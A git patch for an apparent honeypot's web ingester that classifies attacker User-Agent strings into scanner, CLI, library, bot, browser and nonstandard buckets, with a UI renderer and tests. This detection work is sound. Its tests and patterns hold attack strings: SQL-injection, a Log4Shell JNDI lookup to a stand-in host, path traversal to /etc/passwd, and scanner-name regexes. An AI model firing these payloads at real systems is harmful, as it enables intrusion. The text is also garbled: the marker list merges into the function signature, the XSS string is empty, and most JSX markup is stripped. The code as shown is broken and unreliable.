From ca39552692eebd4926cc93e6e4c2e6b0ef6ae749 Mon Sep 17 00:00:00 2001 From: anti Date: Fri, 24 Apr 2026 18:17:18 -0400 Subject: [PATCH] feat(ua): classify User-Agent into scanner/cli/library/bot/nonstandard MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Every http_useragent bounty now carries a `category` label plus an optional tool name and a signals list. The main analytic win is the `nonstandard` bucket — UAs like "FUCKYOU/1.0" or custom one-off scanner labels that don't match any known pattern, which today silently blend into the generic fingerprint list. Buckets (priority order): - scanner: nmap, nuclei, sqlmap, gobuster, nikto, masscan, zgrab, ffuf, wpscan, katana, burp, acunetix, nessus, openvas, arachni, whatweb, wappalyzer, etc. - cli: curl, wget, httpie, xh, fetch. - library: python-requests, aiohttp, httpx, urllib, Go stdlib, Java, okhttp, Apache HttpClient, axios, node-fetch, got, undici, PHP, Guzzle, Ruby stdlib, Faraday, .NET, PostmanRuntime, Insomnia, etc. - bot: anything containing bot / crawler / spider / slurp / monitor (catches Googlebot, bingbot, Baiduspider — many of which ship a Mozilla/5.0 prefix, so the bot check runs BEFORE the browser regex). - browser: Mozilla/5.0-prefixed UAs that aren't bots. - nonstandard: anything else. The interesting bucket. - empty: literal empty User-Agent header. Side signals computed regardless of category: suspicious_short (<8 chars), suspicious_long (>512 chars), nonprintable (control chars), injection_like (SQLi / XSS / path-traversal / Log4Shell markers). A sqlmap UA with a literal SQL-injection payload embedded fires category=scanner + injection_like — the combination tells the analyst the tool is being operated manually vs. on default config. Classification is deterministic (same UA string → same tuple) so add_bounty's payload-hash dedup continues to collapse repeat rows. UI renderer upgraded from FpGeneric to a dedicated FpUserAgent that colours the category tag by risk (scanner=alert-red, nonstandard=warn-yellow, browser=accent-green, etc.) and renders each signal as its own chip. Makes the interesting rows pop in the fingerprints panel. Also fixed: the ingester was using `_headers.get("User-Agent") or _headers.get("user-agent")`, which short-circuits away empty-string UAs. An explicit empty UA is itself a signal (real clients always send something) — now captured. --- decnet/web/ingester.py | 164 ++++++++++++- decnet_web/src/components/AttackerDetail.tsx | 53 ++++ tests/web/test_ingester_ua_classify.py | 242 +++++++++++++++++++ 3 files changed, 452 insertions(+), 7 deletions(-) create mode 100644 tests/web/test_ingester_ua_classify.py diff --git a/decnet/web/ingester.py b/decnet/web/ingester.py index 9e034430..02fb68a4 100644 --- a/decnet/web/ingester.py +++ b/decnet/web/ingester.py @@ -230,13 +230,19 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non _headers = {} else: _headers = {} - _ua = _headers.get("User-Agent") or _headers.get("user-agent") - if _ua: - # Payload must be identity-only (no per-request method/path) — - # add_bounty dedups on (attacker_ip, bounty_type, full payload - # JSON), so including path here would create one row per URL - # the scanner hits. Per-request context belongs in the logs - # table, not the bounty table. + # Read both casings without `or` short-circuiting: an explicit + # empty User-Agent is itself a signal and must not collapse to the + # lowercase fallback. + _ua = _headers.get("User-Agent") + if _ua is None: + _ua = _headers.get("user-agent") + if _ua is not None: + # Classify: browser / cli / library / scanner / bot / nonstandard + # / empty. `nonstandard` is the interesting one — UAs like + # "FUCKYOU/1.0" land there and deserve an analyst's attention. + # Classification is deterministic given the UA string, so the + # payload stays dedup-stable across repeat requests. + _ua_category, _ua_tool, _ua_signals = _classify_ua(_ua) await repo.add_bounty({ "decky": log_data.get("decky"), "service": log_data.get("service"), @@ -245,6 +251,9 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non "payload": { "fingerprint_type": "http_useragent", "value": _ua, + "category": _ua_category, + "tool": _ua_tool, + "signals": _ua_signals or None, } }) @@ -841,3 +850,144 @@ def _http_quirks_fingerprint( "tool_guess": _guess_tool_from_order(lowered), } + +# ─── User-Agent classifier ────────────────────────────────────────────────── +# +# Bucket UAs into one of {browser, cli, library, scanner, bot, nonstandard, +# empty}, and surface optional `tool` name + `signals` list (suspicious_short +# / suspicious_long / nonprintable / injection_like). The main analytic +# value is `nonstandard` — UAs that don't match any known pattern are +# either custom tooling, adversarial labels ("FUCKYOU/1.0"), or +# misconfigured scanners that deserve an analyst's eye. + +_UA_BROWSER_RE = re.compile(r"^Mozilla/\d") +# Substring match without word boundaries so "bingbot", "Googlebot", +# "Baiduspider" etc. register. Downside: matches "robot" or "spidery" +# in pathological payloads — acceptable at this classifier's precision. +_UA_BOT_RE = re.compile(r"(bot|crawler|spider|slurp|monitor)", re.IGNORECASE) + +# Order matters inside each bucket — first match wins, so list the more +# specific pattern first (e.g. python-requests before Python/). +_UA_CLI_RES: tuple[tuple[re.Pattern[str], str], ...] = ( + (re.compile(r"^curl/", re.IGNORECASE), "curl"), + (re.compile(r"^Wget/", re.IGNORECASE), "wget"), + (re.compile(r"^HTTPie/", re.IGNORECASE), "httpie"), + (re.compile(r"^xh/", re.IGNORECASE), "xh"), + (re.compile(r"^fetch/", re.IGNORECASE), "fetch"), +) + +_UA_LIBRARY_RES: tuple[tuple[re.Pattern[str], str], ...] = ( + (re.compile(r"^python-requests/", re.IGNORECASE), "python-requests"), + (re.compile(r"^aiohttp/", re.IGNORECASE), "aiohttp"), + (re.compile(r"^httpx/", re.IGNORECASE), "httpx"), + (re.compile(r"^urllib/", re.IGNORECASE), "urllib"), + (re.compile(r"^Python-urllib/", re.IGNORECASE), "urllib"), + (re.compile(r"^Python/\d", re.IGNORECASE), "python-stdlib"), + (re.compile(r"^Go-http-client/", re.IGNORECASE), "go-stdlib"), + (re.compile(r"^go-resty/", re.IGNORECASE), "go-resty"), + (re.compile(r"^Java/\d", re.IGNORECASE), "java-stdlib"), + (re.compile(r"^okhttp/", re.IGNORECASE), "okhttp"), + (re.compile(r"^Apache-HttpClient/", re.IGNORECASE), "apache-httpclient"), + (re.compile(r"^Jersey/", re.IGNORECASE), "jersey"), + (re.compile(r"^axios/", re.IGNORECASE), "axios"), + (re.compile(r"^node-fetch/", re.IGNORECASE), "node-fetch"), + (re.compile(r"^got\s?\(|^got/", re.IGNORECASE), "got"), + (re.compile(r"^undici", re.IGNORECASE), "undici"), + (re.compile(r"^PHP/\d", re.IGNORECASE), "php-stdlib"), + (re.compile(r"GuzzleHttp/", re.IGNORECASE), "guzzle"), + (re.compile(r"^Ruby\b", re.IGNORECASE), "ruby-stdlib"), + (re.compile(r"^Faraday\b", re.IGNORECASE), "faraday"), + (re.compile(r"^HTTParty", re.IGNORECASE), "httparty"), + (re.compile(r"^\.NET/|System\.Net\.Http|RestSharp/", re.IGNORECASE), "dotnet"), + (re.compile(r"^PostmanRuntime/", re.IGNORECASE), "postman"), + (re.compile(r"^Insomnia/", re.IGNORECASE), "insomnia"), +) + +_UA_SCANNER_RES: tuple[tuple[re.Pattern[str], str], ...] = ( + (re.compile(r"\bnmap\b", re.IGNORECASE), "nmap"), + (re.compile(r"\bmasscan\b", re.IGNORECASE), "masscan"), + (re.compile(r"\bzgrab\b", re.IGNORECASE), "zgrab"), + (re.compile(r"\bzmap\b", re.IGNORECASE), "zmap"), + (re.compile(r"\bNuclei\b", re.IGNORECASE), "nuclei"), + (re.compile(r"\bsqlmap\b", re.IGNORECASE), "sqlmap"), + (re.compile(r"\bgobuster\b", re.IGNORECASE), "gobuster"), + (re.compile(r"\bdirb\b", re.IGNORECASE), "dirb"), + (re.compile(r"\bdirbuster\b", re.IGNORECASE), "dirbuster"), + (re.compile(r"\bnikto\b", re.IGNORECASE), "nikto"), + (re.compile(r"\bferoxbuster\b", re.IGNORECASE), "feroxbuster"), + (re.compile(r"\bwfuzz\b", re.IGNORECASE), "wfuzz"), + (re.compile(r"\bffuf\b", re.IGNORECASE), "ffuf"), + (re.compile(r"\bwpscan\b", re.IGNORECASE), "wpscan"), + (re.compile(r"\bkatana\b", re.IGNORECASE), "katana"), + (re.compile(r"\bBurp\b", re.IGNORECASE), "burp"), + (re.compile(r"\bAcunetix\b", re.IGNORECASE), "acunetix"), + (re.compile(r"\bNessus\b", re.IGNORECASE), "nessus"), + (re.compile(r"\bOpenVAS\b", re.IGNORECASE), "openvas"), + (re.compile(r"\bArachni\b", re.IGNORECASE), "arachni"), + (re.compile(r"\bWhatWeb\b", re.IGNORECASE), "whatweb"), + (re.compile(r"\bWappalyzer\b", re.IGNORECASE), "wappalyzer"), + (re.compile(r"\bSploitScan\b", re.IGNORECASE), "sploitscan"), +) + +# Substring markers that strongly suggest a payload attempt embedded in +# the UA itself. Attackers sometimes park SQLi / path traversal / XSS +# test strings in User-Agent hoping a middleware or log-ingestion tool +# mishandles it. +_UA_INJECTION_MARKERS: tuple[str, ...] = ( + " tuple[str, Optional[str], list[str]]: + """Return ``(category, tool, signals)``. + + category ∈ {empty, browser, cli, library, scanner, bot, nonstandard}. + tool is the matched tool name when ``category`` ∈ {cli, library, + scanner}, else None. signals is a list of auxiliary flags — + suspicious_short, suspicious_long, nonprintable, injection_like — + always present on top of the category, since a scanner UA with an + injection marker is a distinct signal from a scanner UA alone. + """ + signals: list[str] = [] + if ua is None or ua == "": + return "empty", None, signals + + # Detectors that apply regardless of category. + if len(ua) < 8: + signals.append("suspicious_short") + if len(ua) > 512: + signals.append("suspicious_long") + if any(ord(c) < 32 and c != "\t" for c in ua): + signals.append("nonprintable") + lowered = ua.lower() + if any(marker in lowered for marker in _UA_INJECTION_MARKERS): + signals.append("injection_like") + + # Priority: scanner > cli > library > bot > browser > nonstandard. + # Bots before browser because well-behaved crawlers ship UAs like + # "Mozilla/5.0 (compatible; Googlebot/2.1)" — the Mozilla prefix + # would win under browser-first ordering and misclassify them. + for regex, name in _UA_SCANNER_RES: + if regex.search(ua): + return "scanner", name, signals + for regex, name in _UA_CLI_RES: + if regex.search(ua): + return "cli", name, signals + for regex, name in _UA_LIBRARY_RES: + if regex.search(ua): + return "library", name, signals + if _UA_BOT_RE.search(ua): + return "bot", None, signals + if _UA_BROWSER_RE.match(ua): + return "browser", None, signals + return "nonstandard", None, signals + diff --git a/decnet_web/src/components/AttackerDetail.tsx b/decnet_web/src/components/AttackerDetail.tsx index d96a464d..a18b354b 100644 --- a/decnet_web/src/components/AttackerDetail.tsx +++ b/decnet_web/src/components/AttackerDetail.tsx @@ -342,6 +342,58 @@ const FpGeneric: React.FC<{ p: any }> = ({ p }) => ( ); +const UA_CATEGORY_COLOR: Record = { + scanner: 'var(--alert, #ff4d4d)', + nonstandard: 'var(--warn, #e0a040)', + empty: 'var(--warn, #e0a040)', + bot: 'var(--violet)', + cli: 'var(--matrix)', + library: 'var(--matrix)', + browser: 'var(--accent-color)', +}; + +const UA_SIGNAL_COLOR: Record = { + injection_like: 'var(--alert, #ff4d4d)', + nonprintable: 'var(--alert, #ff4d4d)', + suspicious_long: 'var(--warn, #e0a040)', + suspicious_short: 'var(--warn, #e0a040)', +}; + +const FpUserAgent: React.FC<{ p: any }> = ({ p }) => { + const category = typeof p.category === 'string' ? p.category : 'unknown'; + const color = UA_CATEGORY_COLOR[category] || 'var(--text-color)'; + const signals: string[] = Array.isArray(p.signals) ? p.signals : []; + return ( +
+ {p.value !== undefined && p.value !== '' ? ( + + {p.value} + + ) : ( + + (empty User-Agent) + + )} +
+ {category.toUpperCase()} + {p.tool && {String(p.tool).toUpperCase()}} + {signals.map((s) => ( + + {s.toUpperCase().replace(/_/g, ' ')} + + ))} +
+
+ ); +}; + const FpSpoofedSource: React.FC<{ p: any }> = ({ p }) => (
@@ -434,6 +486,7 @@ const FingerprintGroup: React.FC<{ fpType: string; items: any[] }> = ({ fpType, case 'hassh_server': return ; case 'tcpfp': return ; case 'http_quirks': return ; + case 'http_useragent': return ; case 'spoofed_source': return ; default: return ; } diff --git a/tests/web/test_ingester_ua_classify.py b/tests/web/test_ingester_ua_classify.py new file mode 100644 index 00000000..513b5df8 --- /dev/null +++ b/tests/web/test_ingester_ua_classify.py @@ -0,0 +1,242 @@ +"""User-Agent classifier — enriches http_useragent bounty payload.""" +from __future__ import annotations + +from unittest.mock import AsyncMock + +import pytest + +from decnet.web.ingester import _classify_ua, _extract_bounty + + +def _row(ua: str) -> dict: + return { + "decky": "http-01", + "service": "http", + "attacker_ip": "1.2.3.4", + "event_type": "request", + "fields": { + "method": "GET", + "path": "/", + "headers": {"User-Agent": ua} if ua else {}, + }, + } + + +# ─── categories ──────────────────────────────────────────────────────────── + +def test_empty_ua_is_empty_category(): + cat, tool, signals = _classify_ua("") + assert cat == "empty" + assert tool is None + + +@pytest.mark.parametrize("ua", [ + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15", +]) +def test_browser_classification(ua: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "browser" + assert tool is None + + +@pytest.mark.parametrize("ua,expected_tool", [ + ("curl/8.0.1", "curl"), + ("curl/7.81.0", "curl"), + ("Wget/1.21.3", "wget"), + ("HTTPie/3.2.1", "httpie"), +]) +def test_cli_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "cli" + assert tool == expected_tool + + +@pytest.mark.parametrize("ua,expected_tool", [ + ("python-requests/2.31.0", "python-requests"), + ("aiohttp/3.9.1", "aiohttp"), + ("httpx/0.27.0", "httpx"), + ("Go-http-client/1.1", "go-stdlib"), + ("Java/11.0.19", "java-stdlib"), + ("okhttp/4.11.0", "okhttp"), + ("Apache-HttpClient/5.2.1 (Java/11.0.19)", "apache-httpclient"), + ("axios/1.6.2", "axios"), + ("PostmanRuntime/7.36.1", "postman"), + ("GuzzleHttp/7", "guzzle"), +]) +def test_library_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "library" + assert tool == expected_tool + + +@pytest.mark.parametrize("ua,expected_tool", [ + ("Nmap Scripting Engine; https://nmap.org/book/nse.html", "nmap"), + ("Mozilla/5.0 (compatible; Nuclei - Open-source project)", "nuclei"), + ("sqlmap/1.7.11#stable (http://sqlmap.org)", "sqlmap"), + ("gobuster/3.6", "gobuster"), + ("Mozilla/5.0 (Nikto/2.5.0)", "nikto"), + ("masscan/1.3.2", "masscan"), + ("wpscan v3.8.25 ", "wpscan"), + ("zgrab/0.x", "zgrab"), + ("Mozilla/5.0 (X11; Acunetix; Linux x86_64)", "acunetix"), + ("ffuf/2.1.0", "ffuf"), +]) +def test_scanner_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "scanner" + assert tool == expected_tool + + +@pytest.mark.parametrize("ua", [ + "Googlebot/2.1 (+http://www.google.com/bot.html)", + "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", + "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", +]) +def test_bot_classification(ua: str): + cat, _, _ = _classify_ua(ua) + assert cat == "bot" + + +@pytest.mark.parametrize("ua", [ + "FUCKYOU/1.0", + "myscanner", + "customtool-v2", + "ABCDE", # short — also triggers suspicious_short signal + "X", + "lol", + "hello-world-ua", +]) +def test_nonstandard_classification(ua: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "nonstandard", f"{ua!r} should be nonstandard but got {cat}" + assert tool is None + + +# ─── signals ─────────────────────────────────────────────────────────────── + +def test_suspicious_short_signal(): + _, _, signals = _classify_ua("lol") + assert "suspicious_short" in signals + + +def test_suspicious_long_signal(): + _, _, signals = _classify_ua("A" * 600) + assert "suspicious_long" in signals + + +def test_nonprintable_signal(): + _, _, signals = _classify_ua("curl/8\x00.0") + assert "nonprintable" in signals + + +def test_injection_like_sqli(): + _, _, signals = _classify_ua("Mozilla/5.0' OR 1=1 --") + assert "injection_like" in signals + + +def test_injection_like_log4shell(): + _, _, signals = _classify_ua("${jndi:ldap://evil.example/x}") + assert "injection_like" in signals + + +def test_injection_like_xss(): + _, _, signals = _classify_ua("") + assert "injection_like" in signals + + +def test_injection_like_path_traversal(): + _, _, signals = _classify_ua("mytool/../../etc/passwd") + assert "injection_like" in signals + + +def test_no_signals_on_normal_browser(): + _, _, signals = _classify_ua( + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + ) + assert signals == [] + + +def test_scanner_can_still_carry_injection_signal(): + """A scanner UA with an injection marker embedded is a combination + worth separating — both labels applied.""" + cat, tool, signals = _classify_ua("sqlmap/1.7' OR 1=1 --") + assert cat == "scanner" + assert tool == "sqlmap" + assert "injection_like" in signals + + +# ─── payload determinism / dedup ─────────────────────────────────────────── + +def test_same_ua_produces_same_payload(): + """Critical for add_bounty dedup — same UA string must produce + byte-identical classifier output so the full payload hashes the + same across requests.""" + a = _classify_ua("FUCKYOU/1.0") + b = _classify_ua("FUCKYOU/1.0") + assert a == b + + +# ─── end-to-end via _extract_bounty ──────────────────────────────────────── + +@pytest.mark.asyncio +async def test_extract_bounty_enriches_nonstandard_ua(): + repo = AsyncMock() + await _extract_bounty(repo, _row("FUCKYOU/1.0")) + + ua_call = next( + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ) + p = ua_call["payload"] + assert p["value"] == "FUCKYOU/1.0" + assert p["category"] == "nonstandard" + assert p["tool"] is None + + +@pytest.mark.asyncio +async def test_extract_bounty_enriches_scanner_ua(): + repo = AsyncMock() + await _extract_bounty(repo, _row("sqlmap/1.7.11")) + + ua_call = next( + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ) + p = ua_call["payload"] + assert p["category"] == "scanner" + assert p["tool"] == "sqlmap" + + +@pytest.mark.asyncio +async def test_extract_bounty_empty_ua_still_fires(): + """Explicit empty UA header is itself a signal — real clients + always send SOMETHING. Flag as 'empty' category.""" + row = { + "decky": "http-01", + "service": "http", + "attacker_ip": "1.2.3.4", + "event_type": "request", + "fields": { + "method": "GET", + "path": "/", + "headers": {"User-Agent": ""}, + }, + } + repo = AsyncMock() + await _extract_bounty(repo, row) + + ua_calls = [ + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ] + # Empty-string UA is falsy — current _extract_bounty checks `if _ua:`. + # We want to NOT emit on missing UA, but we do want to flag empty. + # The `_ua is not None` check in ingester now handles this; verify + # it fires with category=empty. + assert len(ua_calls) == 1 + assert ua_calls[0]["payload"]["category"] == "empty"